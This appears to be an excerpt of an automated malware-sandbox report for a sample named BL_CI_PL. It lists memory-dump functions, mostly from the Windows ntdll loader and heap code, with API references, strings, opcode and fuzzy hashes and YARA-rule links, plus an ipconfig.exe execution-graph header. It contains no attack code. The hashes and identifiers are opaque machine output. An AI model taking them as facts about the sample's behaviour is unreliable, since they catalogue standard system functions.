                                                                                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-3589223738
                                                                                                                                                      • Opcode ID: caf96870fc8b907e7af400f2a6f0ea852e67359adf276239a552d818ba73a0c2
                                                                                                                                                      • Instruction ID: 682e3a91715ebe75fade4b67ead3a57acf4bb3dda9fadc46434c60c8b781e3a4
                                                                                                                                                      • Opcode Fuzzy Hash: caf96870fc8b907e7af400f2a6f0ea852e67359adf276239a552d818ba73a0c2
                                                                                                                                                      • Instruction Fuzzy Hash: B551C575A143989FDB04DBACCC94AED77B6BFC0704F440729E951AB299DB70AC40DB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8DD6D0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8DD879
                                                                                                                                                        • Part of subcall function 1E8B4779: RtlDebugPrintTimes.NTDLL ref: 1E8B4817
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-1975516107
                                                                                                                                                      • Opcode ID: c1130e7e8669445e8c4ba47fa0d1b826a21e89d755ff5f5583e68731259bbb83
                                                                                                                                                      • Instruction ID: 77e7f194914af7331846821446534c7fd975cd5619fb499ed6ba79e2d4029400
                                                                                                                                                      • Opcode Fuzzy Hash: c1130e7e8669445e8c4ba47fa0d1b826a21e89d755ff5f5583e68731259bbb83
                                                                                                                                                      • Instruction Fuzzy Hash: 5A51B075A0838A9FDB05DFA8C48479DBBB2BF84324F244799D4016B2C1D774A989CB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E95ECD7, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Entry Heap Size , xrefs: 1E95EDED
                                                                                                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1E95EDE3
                                                                                                                                                      • HEAP: , xrefs: 1E95ECDD
                                                                                                                                                      • ---------------------------------------, xrefs: 1E95EDF9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                      • API String ID: 3446177414-1102453626
                                                                                                                                                      • Opcode ID: 2c55faccb35043b79ec81085057293245eaa467a498317241b3f1f7b0adc4b37
                                                                                                                                                      • Instruction ID: c868dafd79be457cf34d8ee75ffd9967d4b38b90fae92619c0905e85f5acb4a6
                                                                                                                                                      • Opcode Fuzzy Hash: 2c55faccb35043b79ec81085057293245eaa467a498317241b3f1f7b0adc4b37
                                                                                                                                                      • Instruction Fuzzy Hash: 6841A035A10265DFC715CF19C484969BBEAFF86354725C66EE5059B311D732EC42CF80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8B9046, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 3446177414-1194432280
                                                                                                                                                      • Opcode ID: e26063e3f05b1aa997a426d17ce9f8b320ae7ca24839c3c8c8f7ad7ed74c497e
                                                                                                                                                      • Instruction ID: c98bde17c0fa261a47899e7984c6b9e6e5bb54824f4baee5c868f2f75c61a0cd
                                                                                                                                                      • Opcode Fuzzy Hash: e26063e3f05b1aa997a426d17ce9f8b320ae7ca24839c3c8c8f7ad7ed74c497e
                                                                                                                                                      • Instruction Fuzzy Hash: 2F812BB5D002A9DBDB21DB54CC44BDEB6B9AF48710F0446EAE909B7290D7309E85DFA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8D237A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      • LdrpDynamicShimModule, xrefs: 1E91A7A5
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E91A7AF
                                                                                                                                                      • apphelp.dll, xrefs: 1E8D2382
                                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1E91A79F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 0-176724104
                                                                                                                                                      • Opcode ID: d4708db23695592a5202b63dac98325e3e7f7c69ddcbd7ebfb0415e3da182b1e
                                                                                                                                                      • Instruction ID: 1f1e4e0474150e321b77c28bd2b8f411c3b34d0dc6717ae0890b619ad47358da
                                                                                                                                                      • Opcode Fuzzy Hash: d4708db23695592a5202b63dac98325e3e7f7c69ddcbd7ebfb0415e3da182b1e
                                                                                                                                                      • Instruction Fuzzy Hash: C1311276A04259EBD7159F29CCC0A9E77FAFFC0B20F14026DE911AB254E7B4AD41CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8AF8B0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 3446177414-3610490719
                                                                                                                                                      • Opcode ID: 8e7dc8a89f7fe1fd8b01ed148f73f4ad947f9e72e5fd6f67020f0503b25cf44c
                                                                                                                                                      • Instruction ID: 307c4f4e8f421d2bf7b35f46c5c7d3b133776947de916ac59e53f4f42b6af5c4
                                                                                                                                                      • Opcode Fuzzy Hash: 8e7dc8a89f7fe1fd8b01ed148f73f4ad947f9e72e5fd6f67020f0503b25cf44c
                                                                                                                                                      • Instruction Fuzzy Hash: 1891E975604695AFC726CB29C850B6EB7AABFC4644F040B5DFA419B3C1DB34F881CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8D9723, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-2283098728
                                                                                                                                                      • Opcode ID: 327ee4a9f29d3afaa92717f7b94d5f985897b93956a00249fa3975773f5e744c
                                                                                                                                                      • Instruction ID: 26231f69fd9affdda2d8a923c04133c5bf282a4dcbabc8451240df92e4f22833
                                                                                                                                                      • Opcode Fuzzy Hash: 327ee4a9f29d3afaa92717f7b94d5f985897b93956a00249fa3975773f5e744c
                                                                                                                                                      • Instruction Fuzzy Hash: 635103346047469BC714DF38C884A6977A3BFC4724F180B2DE556AB6D5EBB0E819CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8EC640, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E9280F3
                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 1E9280E2
                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 1E9280E9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-1783798831
                                                                                                                                                      • Opcode ID: 2de34aacfefc48e9f657c1b94328eda0ece676b0a917078bd556cb190353ea88
                                                                                                                                                      • Instruction ID: 3deba6ef43fa002e508b819e1729657c9f121ec7db323456b1033ad7a258b6ef
                                                                                                                                                      • Opcode Fuzzy Hash: 2de34aacfefc48e9f657c1b94328eda0ece676b0a917078bd556cb190353ea88
                                                                                                                                                      • Instruction Fuzzy Hash: 4E41C3B5918395ABC711DF68DC80B9B77E9AFC5650F014B2EF948972A5EB30E800CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E9343D5, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 1E934519
                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1E934508
                                                                                                                                                      • LdrpCheckRedirection, xrefs: 1E93450F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                      • API String ID: 3446177414-3154609507
                                                                                                                                                      • Opcode ID: 80c46eede089bfe77bbfc0ffe475d33ea95d92ee51f74c400111ede1f5d1d829
                                                                                                                                                      • Instruction ID: f9baf58a8a3cb25319cb36b62dde0c12f4ec6237ce1c593a6330d4a4a365dbf9
                                                                                                                                                      • Opcode Fuzzy Hash: 80c46eede089bfe77bbfc0ffe475d33ea95d92ee51f74c400111ede1f5d1d829
                                                                                                                                                      • Instruction Fuzzy Hash: 5B41B03A6142219BCB12CF79D848A5677EBAF88752B270B7DEC9897355D730EC008F91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E935B90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Wow64 Emulation Layer
                                                                                                                                                      • API String ID: 3446177414-921169906
                                                                                                                                                      • Opcode ID: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
                                                                                                                                                      • Instruction ID: bc3b4e6b1089beb7e32d916fe1d3c012bcd337d921a61a98c7cccc1e2e8e0d6b
                                                                                                                                                      • Opcode Fuzzy Hash: 8a9779b77936d709f7e80b663a36317e8bba99cd6da6e7207084c04f89fd1fde
                                                                                                                                                      • Instruction Fuzzy Hash: 7321F7B990015DBFEB029BA48D84DFF7B7DFF49299B140654FA01A2240EB30EE01DB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E98A04A, Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 97b14d3bf8f0da33b18e068f35ef6cc6a1af7ae86a5991a0935e4b96c11cc701
                                                                                                                                                      • Instruction ID: 10a79a7269905eea22202fb4548abb4920e13e959e3ffc25b23b305d866aa4bf
                                                                                                                                                      • Opcode Fuzzy Hash: 97b14d3bf8f0da33b18e068f35ef6cc6a1af7ae86a5991a0935e4b96c11cc701
                                                                                                                                                      • Instruction Fuzzy Hash: 3A519A7471461A9FDB49CE19C8A0E19B3E6FF8A310B144A6DD906CB724DBB9EC41CF80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E92EBC0, Relevance: 6.2, APIs: 4, Instructions: 158timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: f02ac4c9d012f245d7e2ebf04df55f0053e38068ed69226c2a9e0235db5844bd
                                                                                                                                                      • Instruction ID: 7ad7233e43b65d1d3c50cfad63262f3f10c2ca056686c13a3d2c4abd0dc11025
                                                                                                                                                      • Opcode Fuzzy Hash: f02ac4c9d012f245d7e2ebf04df55f0053e38068ed69226c2a9e0235db5844bd
                                                                                                                                                      • Instruction Fuzzy Hash: F45123B2E1121A9FDF09CF95D881AEDBBB6BF88310F54822EE805BB254D7359940CF54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8E7A4F, Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4281723722-0
                                                                                                                                                      • Opcode ID: a2b15276379ff87db1f2cf78fb4121e57a2f57ce2a9624a55964062a90362271
                                                                                                                                                      • Instruction ID: b198efc23697de7da5c5f3158354c0751314f573068ce5749adddb57e1a544b2
                                                                                                                                                      • Opcode Fuzzy Hash: a2b15276379ff87db1f2cf78fb4121e57a2f57ce2a9624a55964062a90362271
                                                                                                                                                      • Instruction Fuzzy Hash: 2F31E279E14269EFCF15DFA8D884A9DBBB1BF88720F10462AE511B7294D7355900CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8B58E0, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 0-2766056989
                                                                                                                                                      • Opcode ID: 0906a1972aaf8fcfcf51c48ba8caa364c05fc321963dcc55275830f10349ae8a
                                                                                                                                                      • Instruction ID: acf76b2e07ccf47a08d1daa09b3de710dd2e71b7ca9a6eb1219dade3d095b5f2
                                                                                                                                                      • Opcode Fuzzy Hash: 0906a1972aaf8fcfcf51c48ba8caa364c05fc321963dcc55275830f10349ae8a
                                                                                                                                                      • Instruction Fuzzy Hash: 8A324674D142AACFDB21CF69C844BDDBBB6BB08304F0446E9D449A7391D775AA84CFA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8E4B79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0$Flst
                                                                                                                                                      • API String ID: 0-758220159
                                                                                                                                                      • Opcode ID: f3ab83caccc48749af72545d14d412eaef2d758060ca0ebd567592f266a8fdfc
                                                                                                                                                      • Instruction ID: 4a34c8c51880db264d4ad472193fb63e75de21af0e0629e119e44ccb73a3efb7
                                                                                                                                                      • Opcode Fuzzy Hash: f3ab83caccc48749af72545d14d412eaef2d758060ca0ebd567592f266a8fdfc
                                                                                                                                                      • Instruction Fuzzy Hash: AC51CCB1E1068A8FCB11CF99C48475DFBF6EF85714F54C62ED4499B688E7B09981CB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8B0485, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • kLsE, xrefs: 1E8B05FE
                                                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1E8B0586
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                      • API String ID: 3446177414-2547482624
                                                                                                                                                      • Opcode ID: 4c9b1930d407524ce5d7e75e5ede1a0a9b05738ad0fa10574640257d1f718216
                                                                                                                                                      • Instruction ID: 520aa1bc67232efbc796ce0e24342776ac1376ec7a2ae064a2977389b5560793
                                                                                                                                                      • Opcode Fuzzy Hash: 4c9b1930d407524ce5d7e75e5ede1a0a9b05738ad0fa10574640257d1f718216
                                                                                                                                                      • Instruction Fuzzy Hash: C351D1B5A0078ADFDB24DFA9C4406EBB7F9AF44300F004A3ED5A597740E730A546CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8ADF21, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: 0$0
                                                                                                                                                      • API String ID: 3446177414-203156872
                                                                                                                                                      • Opcode ID: 564028cbeb4164221c0f68326661a71f3c1e9e63538209fdf7396bc3aac9230b
                                                                                                                                                      • Instruction ID: 0e1a7a5f8e39c93208e956d95e0097eb3e309448b68dd43667f3a77321da4b14
                                                                                                                                                      • Opcode Fuzzy Hash: 564028cbeb4164221c0f68326661a71f3c1e9e63538209fdf7396bc3aac9230b
                                                                                                                                                      • Instruction Fuzzy Hash: 7E414CB16087469FC300CF29C484A5BBBE5BF89318F044A6EF588DB381D771EA45CB96
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Analysis Process: ipconfig.exe PID: 4888 Parent PID: 432 ipconfig.exeCOMMON

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:2.8%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:1.1%
                                                                                                                                                      Total number of Nodes:1210
                                                                                                                                                      Total number of Limit Nodes:123

                                                                                                                                                      Graph

